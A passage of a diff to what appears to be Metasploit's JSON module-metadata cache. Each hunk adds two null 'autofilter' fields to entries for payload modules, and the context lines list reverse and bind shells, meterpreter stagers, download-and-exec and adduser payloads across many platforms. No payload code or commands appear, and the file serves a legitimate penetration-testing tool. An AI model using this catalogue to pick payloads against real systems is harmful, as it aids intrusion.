"mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb", @@ -98828,6 +127074,8 @@ "platform": "BSDi", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb", @@ -98858,6 +127106,8 @@ "platform": "BSDi", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsdi/x86/shell_find_port.rb", @@ -98888,6 +127138,8 @@ "platform": "BSDi", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb", @@ -98918,6 +127170,8 @@ "platform": "Mainframe", "arch": "cmd", "rport": 21, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb", @@ -98947,6 +127201,8 @@ "platform": "Mainframe", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-29 16:52:36 +0000", "path": "/modules/payloads/singles/cmd/mainframe/bind_shell_jcl.rb", @@ -98976,6 +127232,8 @@ "platform": "Mainframe", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/mainframe/generic_jcl.rb", @@ -99005,6 +127263,8 @@ "platform": "Mainframe", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-29 18:27:29 +0000", "path": "/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb", @@ -99035,6 +127295,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-16 04:06:58 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_awk.rb", @@ -99064,6 +127326,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-01-03 18:43:51 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb", @@ -99093,6 +127357,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb", @@ -99122,6 +127388,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb", @@ -99153,6 +127421,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb", @@ -99182,6 +127452,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb", @@ -99211,6 +127483,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb", @@ -99240,6 +127514,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-10-11 11:09:28 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_nodejs.rb", @@ -99270,6 +127546,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_perl.rb", @@ -99300,6 +127578,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb", @@ -99329,6 +127609,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-28 05:30:30 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_r.rb", @@ -99358,6 +127640,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb", @@ -99387,6 +127671,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb", @@ -99416,6 +127702,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb", @@ -99445,6 +127733,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-12-28 16:21:37 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_stub.rb", @@ -99475,6 +127765,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-15 19:42:39 +0000", "path": "/modules/payloads/singles/cmd/unix/bind_zsh.rb", @@ -99504,6 +127796,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/generic.rb", @@ -99533,6 +127827,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/interact.rb", @@ -99562,6 +127858,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse.rb", @@ -99593,6 +127891,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-16 04:06:58 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_awk.rb", @@ -99622,6 +127922,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-10 18:34:21 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb", @@ -99651,6 +127953,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-15 20:50:30 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb", @@ -99680,6 +127984,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-15 19:56:55 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_ksh.rb", @@ -99709,6 +128015,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb", @@ -99738,6 +128046,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb", @@ -99769,6 +128079,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-23 18:00:02 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb", @@ -99798,6 +128110,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-23 18:00:02 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb", @@ -99827,6 +128141,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_nodejs.rb", @@ -99856,6 +128172,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb", @@ -99885,6 +128203,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb", @@ -99914,6 +128234,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb", @@ -99943,6 +128265,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-19 15:49:46 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb", @@ -99972,6 +128296,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb", @@ -100001,6 +128327,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb", @@ -100030,6 +128358,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-28 05:30:30 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_r.rb", @@ -100059,6 +128389,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb", @@ -100088,6 +128420,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb", @@ -100117,6 +128451,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb", @@ -100147,6 +128483,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb", @@ -100176,6 +128514,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-12-28 16:21:37 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_stub.rb", @@ -100206,6 +128546,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-15 19:42:39 +0000", "path": "/modules/payloads/singles/cmd/unix/reverse_zsh.rb", @@ -100237,6 +128579,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/windows/adduser.rb", @@ -100266,6 +128610,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/windows/bind_lua.rb", @@ -100297,6 +128643,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/payloads/singles/cmd/windows/bind_perl.rb", @@ -100328,6 +128676,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb", @@ -100357,6 +128707,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/windows/bind_ruby.rb", @@ -100386,6 +128738,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/windows/download_eval_vbs.rb", @@ -100415,6 +128769,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/windows/download_exec_vbs.rb", @@ -100444,6 +128800,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/windows/generic.rb", @@ -100474,6 +128832,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb", @@ -100504,6 +128864,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb", @@ -100533,6 +128895,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/windows/reverse_lua.rb", @@ -100563,6 +128927,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/payloads/singles/cmd/windows/reverse_perl.rb", @@ -100593,6 +128959,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/windows/reverse_powershell.rb", @@ -100622,6 +128990,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/cmd/windows/reverse_ruby.rb", @@ -100651,6 +129021,8 @@ "platform": "Firefox", "arch": "firefox", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/payloads/singles/firefox/exec.rb", @@ -100680,6 +129052,8 @@ "platform": "Firefox", "arch": "firefox", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/firefox/shell_bind_tcp.rb", @@ -100709,6 +129083,8 @@ "platform": "Firefox", "arch": "firefox", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/firefox/shell_reverse_tcp.rb", @@ -100738,6 +129114,8 @@ "platform": "All", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/generic/custom.rb", @@ -100767,6 +129145,8 @@ "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/generic/debug_trap.rb", @@ -100796,6 +129176,8 @@ "platform": "All", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/generic/shell_bind_tcp.rb", @@ -100825,6 +129207,8 @@ "platform": "All", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/generic/shell_reverse_tcp.rb", @@ -100854,6 +129238,8 @@ "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/generic/tight_loop.rb", @@ -100883,6 +129269,8 @@ "platform": "Linux,OSX,Solaris,Unix,Windows", "arch": "java", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/java/jsp_shell_bind_tcp.rb", @@ -100912,6 +129300,8 @@ "platform": "Linux,OSX,Solaris,Unix,Windows", "arch": "java", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb", @@ -100943,6 +129333,8 @@ "platform": "Java", "arch": "java", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/java/bind_tcp.rb", @@ -100975,6 +129367,8 @@ "platform": "Java", "arch": "java", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/java/reverse_http.rb", @@ -101007,6 +129401,8 @@ "platform": "Java", "arch": "java", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/java/reverse_https.rb", @@ -101038,6 +129434,8 @@ "platform": "Java", "arch": "java", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/java/reverse_tcp.rb", @@ -101068,6 +129466,8 @@ "platform": "Java", "arch": "java", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/java/bind_tcp.rb", @@ -101098,6 +129498,8 @@ "platform": "Java", "arch": "java", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/java/reverse_tcp.rb", @@ -101128,6 +129530,8 @@ "platform": "Java", "arch": "java", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/java/shell_reverse_tcp.rb", @@ -101157,6 +129561,8 @@ "platform": "Linux", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-29 10:09:38 +0000", "path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb", @@ -101188,6 +129594,8 @@ "platform": "Linux", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb", @@ -101219,6 +129627,8 @@ "platform": "Linux", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb", @@ -101250,6 +129660,8 @@ "platform": "Linux", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb", @@ -101279,6 +129691,8 @@ "platform": "Linux", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-29 10:09:38 +0000", "path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb", @@ -101308,6 +129722,8 @@ "platform": "Linux", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-21 14:42:30 +0000", "path": "/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb", @@ -101339,6 +129755,8 @@ "platform": "Linux", "arch": "armbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb", @@ -101370,6 +129788,8 @@ "platform": "Linux", "arch": "armbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb", @@ -101401,6 +129821,8 @@ "platform": "Linux", "arch": "armbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb", @@ -101430,6 +129852,8 @@ "platform": "Linux", "arch": "armbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb", @@ -101459,6 +129883,8 @@ "platform": "Linux", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/armle/adduser.rb", @@ -101488,6 +129914,8 @@ "platform": "Linux", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/armle/exec.rb", @@ -101518,6 +129946,8 @@ "platform": "Linux", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb", @@ -101549,6 +129979,8 @@ "platform": "Linux", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb", @@ -101580,6 +130012,8 @@ "platform": "Linux", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb", @@ -101611,6 +130045,8 @@ "platform": "Linux", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb", @@ -101642,6 +130078,8 @@ "platform": "Linux", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb", @@ -101671,6 +130109,8 @@ "platform": "Linux", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb", @@ -101701,6 +130141,8 @@ "platform": "Linux", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb", @@ -101731,6 +130173,8 @@ "platform": "Linux", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-21 12:25:27 +0000", "path": "/modules/payloads/singles/linux/armle/shell_bind_tcp.rb", @@ -101760,6 +130204,8 @@ "platform": "Linux", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-21 12:25:27 +0000", "path": "/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb", @@ -101791,6 +130237,8 @@ "platform": "Linux", "arch": "mips64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb", @@ -101822,6 +130270,8 @@ "platform": "Linux", "arch": "mips64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb", @@ -101853,6 +130303,8 @@ "platform": "Linux", "arch": "mips64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb", @@ -101883,6 +130335,8 @@ "platform": "Linux", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/mipsbe/exec.rb", @@ -101914,6 +130368,8 @@ "platform": "Linux", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb", @@ -101945,6 +130401,8 @@ "platform": "Linux", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb", @@ -101976,6 +130434,8 @@ "platform": "Linux", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb", @@ -102007,6 +130467,8 @@ "platform": "Linux", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb", @@ -102037,6 +130499,8 @@ "platform": "Linux", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/mipsbe/reboot.rb", @@ -102067,6 +130531,8 @@ "platform": "Linux", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb", @@ -102099,6 +130565,8 @@ "platform": "Linux", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb", @@ -102129,6 +130597,8 @@ "platform": "Linux", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb", @@ -102159,6 +130629,8 @@ "platform": "Linux", "arch": "mipsle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": 